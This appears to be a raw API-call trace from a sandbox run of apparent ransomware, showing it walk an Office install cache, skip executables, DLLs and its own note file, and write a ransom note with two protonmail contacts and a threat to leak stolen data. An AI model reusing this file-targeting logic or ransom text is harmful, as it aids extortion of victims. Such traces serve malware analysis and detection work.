lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0149.642] lstrcmpW (lpString1="OWOW32WW.cab", lpString2=".") returned 1 [0149.642] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="..") returned 1 [0149.642] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".UAKXC") returned 0x0 [0149.642] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".exe") returned 0x0 [0149.642] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".dll") returned 0x0 [0149.642] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".lnk") returned 0x0 [0149.642] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".sys") returned 0x0 [0149.642] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".msi") returned 0x0 [0149.642] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch="R3ADM3.txt") returned 0x0 [0149.642] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d80 [0149.642] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.642] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.642] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.642] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.642] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.642] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d80 | out: hHeap=0xea0000) returned 1 [0149.642] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.642] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d80 [0149.643] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef71b0 [0149.643] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.643] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.643] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0149.643] lstrcmpW (lpString1="PidGenX.dll", lpString2=".") returned 1 [0149.643] lstrcmpW (lpString1="PidGenX.dll", lpString2="..") returned 1 [0149.643] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".UAKXC") returned 0x0 [0149.643] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".exe") returned 0x0 [0149.643] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".dll") returned=".dll" [0149.643] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0149.643] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0149.643] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0149.643] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".UAKXC") returned 0x0 [0149.643] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".exe") returned 0x0 [0149.643] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".dll") returned 0x0 [0149.643] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".lnk") returned 0x0 [0149.643] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".sys") returned 0x0 [0149.643] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".msi") returned 0x0 [0149.643] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch="R3ADM3.txt") returned 0x0 [0149.643] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1890 [0149.643] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.644] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.644] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.644] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.644] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.644] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0149.644] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0x7770008 [0149.644] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2bc8 [0149.644] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0x7462e88 [0149.644] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7770008 | out: hHeap=0xea0000) returned 1 [0149.644] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.644] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0149.644] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2=".") returned 1 [0149.644] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="..") returned 1 [0149.644] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".UAKXC") returned 0x0 [0149.644] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".exe") returned 0x0 [0149.644] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".dll") returned 0x0 [0149.644] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".lnk") returned 0x0 [0149.644] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".sys") returned 0x0 [0149.644] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".msi") returned=".msi" [0149.644] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0149.645] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2=".") returned 1 [0149.645] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="..") returned 1 [0149.645] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".UAKXC") returned 0x0 [0149.645] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".exe") returned 0x0 [0149.645] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".dll") returned 0x0 [0149.645] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".lnk") returned 0x0 [0149.645] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".sys") returned 0x0 [0149.645] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".msi") returned 0x0 [0149.645] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3488 [0149.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.645] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.645] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.645] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3488 | out: hHeap=0xea0000) returned 1 [0149.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3488 [0149.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef7258 [0149.645] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.645] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.646] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0149.646] lstrcmpW (lpString1="ProPrWW.cab", lpString2=".") returned 1 [0149.646] lstrcmpW (lpString1="ProPrWW.cab", lpString2="..") returned 1 [0149.646] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".UAKXC") returned 0x0 [0149.646] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".exe") returned 0x0 [0149.646] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".dll") returned 0x0 [0149.646] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".lnk") returned 0x0 [0149.646] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".sys") returned 0x0 [0149.646] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".msi") returned 0x0 [0149.646] StrStrIW (lpFirst="ProPrWW.cab", lpSrch="R3ADM3.txt") returned 0x0 [0149.646] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ba0 [0149.646] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.646] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.646] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.646] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.646] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.646] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ba0 | out: hHeap=0xea0000) returned 1 [0149.646] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.646] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ba0 [0149.646] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef7300 [0149.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.647] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0149.647] lstrcmpW (lpString1="ProPrWW2.cab", lpString2=".") returned 1 [0149.647] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="..") returned 1 [0149.647] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".UAKXC") returned 0x0 [0149.647] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".exe") returned 0x0 [0149.647] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".dll") returned 0x0 [0149.647] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".lnk") returned 0x0 [0149.647] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".sys") returned 0x0 [0149.647] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".msi") returned 0x0 [0149.647] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch="R3ADM3.txt") returned 0x0 [0149.647] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b50 [0149.647] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.647] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.647] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b50 | out: hHeap=0xea0000) returned 1 [0149.647] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.647] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b50 [0149.647] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef73a8 [0149.648] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.648] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.648] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5e352d90, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5e352d90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e352d90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0149.648] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0149.648] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0149.648] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0149.648] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0149.648] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0149.648] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0149.648] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0149.648] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0149.648] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0149.648] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0149.648] lstrcmpW (lpString1="setup.exe", lpString2=".") returned 1 [0149.648] lstrcmpW (lpString1="setup.exe", lpString2="..") returned 1 [0149.648] StrStrIW (lpFirst="setup.exe", lpSrch=".UAKXC") returned 0x0 [0149.648] StrStrIW (lpFirst="setup.exe", lpSrch=".exe") returned=".exe" [0149.648] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0149.648] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0149.648] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0149.648] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0149.648] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0149.649] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0149.649] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0149.649] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0149.649] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0149.649] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.649] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3348 [0149.649] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.649] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.649] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.649] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.649] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.649] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3348 | out: hHeap=0xea0000) returned 1 [0149.649] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.649] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3348 [0149.649] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef7450 [0149.649] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.649] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.649] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0149.650] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.650] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e78 | out: hHeap=0xea0000) returned 1 [0149.650] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0149.650] Sleep (dwMilliseconds=0x32) [0149.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0149.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0149.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e78 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.823] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e78 | out: hHeap=0xea0000) returned 1 [0149.824] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0149.934] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0149.934] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0149.935] CloseHandle (hObject=0x6dc) returned 1 [0149.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.936] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x5e6267b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e6267b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0149.936] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0149.936] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x5e6267b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e6267b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.936] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0149.936] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0149.936] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0149.936] lstrcmpW (lpString1="Office32WW.msi", lpString2=".") returned 1 [0149.937] lstrcmpW (lpString1="Office32WW.msi", lpString2="..") returned 1 [0149.937] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".UAKXC") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".exe") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".dll") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".lnk") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".sys") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".msi") returned=".msi" [0149.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, 